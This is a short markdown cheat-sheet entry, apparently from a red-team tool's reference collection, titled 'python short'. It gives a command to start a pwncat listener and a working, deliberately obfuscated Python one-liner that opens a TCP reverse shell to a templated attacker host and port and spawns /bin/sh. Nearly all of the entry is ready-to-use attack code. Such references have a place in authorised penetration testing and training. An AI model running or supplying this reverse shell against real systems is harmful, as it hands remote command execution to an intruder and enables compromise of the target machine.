# python short

[TOC]

## Vars

| Variable | Value     | Description |
| -------- | --------- | ----------- |
| LHOST    | {{LHOST}} | The IP the target will connect to |
| LPORT    | {{LPORT}} | The port the target will connect to |

## Description

Short, somewhat obfuscated python reverse shell oneliner (TCP, Unix).

## Commands

### Red: Create Listener

```bash
autovnet rtfm pwncat -n {{LHOST}} {{LPORT}}
```

### Blue: Throw Reverse Shell

```bash
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("{{LHOST}}",{{LPORT}}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
```
